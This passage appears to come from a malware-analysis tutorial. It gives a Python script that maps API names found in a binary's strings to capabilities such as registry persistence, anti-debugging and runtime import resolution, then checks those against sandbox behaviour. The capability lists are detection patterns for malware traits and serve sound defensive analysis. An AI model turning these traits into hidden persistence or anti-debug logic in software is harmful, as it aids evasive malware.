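SHCreateDirectoryExW SHFileOperationW SHGetFolderPathW StringFromGUID2 TerminateProcess
UuidCreate WriteFile
""".split()

# What each visible API group lets the binary do; the category names are this example's own.
CAPABILITIES = {
    "registry_write": {"RegCreateKeyExW", "RegSetValueExW"},
    "profile_dir_lookup": {"SHGetFolderPathW", "SHCreateDirectoryExW"},
    "file_copy_or_move": {"SHFileOperationW", "CreateFileA", "WriteFile"},
    "guid_generation": {"CoCreateGuid", "UuidCreate", "StringFromGUID2"},
    "anti_debug": {"IsDebuggerPresent"},
    "runtime_api_resolution": {"GetProcAddress", "GetModuleHandleA"},
    "resource_enumeration": {"EnumResourceNamesA"},
    "com_client": {"CoInitialize", "CoCreateInstance", "CoSetProxyBlanket"},
    "system_info": {"GetVersionExA"},
}
# DLLs a statically linked HTTP or DNS client would import (assumed list).
NETWORK_DLLS = {"wininet.dll", "winhttp.dll", "ws2_32.dll", "wsock32.dll", "urlmon.dll"}


def capability_report(strings) -> dict:
    """Map visible DLL and API names to capability categories."""
    names = set(strings)
    dlls = {s.lower() for s in names if s.lower().endswith(".dll")}
    hits = {cap: sorted(names & apis) for cap, apis in CAPABILITIES.items() if names & apis}
    return {"dlls": dlls, "capabilities": hits,
            "network_dlls_visible": bool(dlls & NETWORK_DLLS)}


def reconcile(report: dict, observed: set) -> list:
    """Compare the static picture with sandbox behaviour.  `observed` holds
    labels such as "network" or "registry_run_key" (labels are this example's)."""
    flags = []
    caps = report["capabilities"]
    if "network" in observed and not report["network_dlls_visible"]:
        # Network traffic without a visible network import: the real import
        # table is built at runtime or lives in an unpacked stage.
        flags.append("network_capability_not_in_strings")
    if "registry_run_key" in observed and "registry_write" in caps and "profile_dir_lookup" in caps:
        flags.append("persistence_apis_match_behaviour")
    if "anti_debug" in caps:
        flags.append("debugger_check_present")
    if "runtime_api_resolution" in caps:
        flags.append("expect_hidden_imports")
    return flags


if __name__ == "__main__":
    rep = capability_report(STRINGS)
    for cap, apis in rep["capabilities"].items():
        print(f"{cap:24} {', '.join(apis)}")
    print(reconcile(rep, {"network", "registry_run_key"}))
```

The point of reconcile() is the gap it exposes: when behaviour seen in the sandbox has no matching import in the strings, the static view is incomplete and the interesting code is only reachable through dynamic analysis or a memory dump.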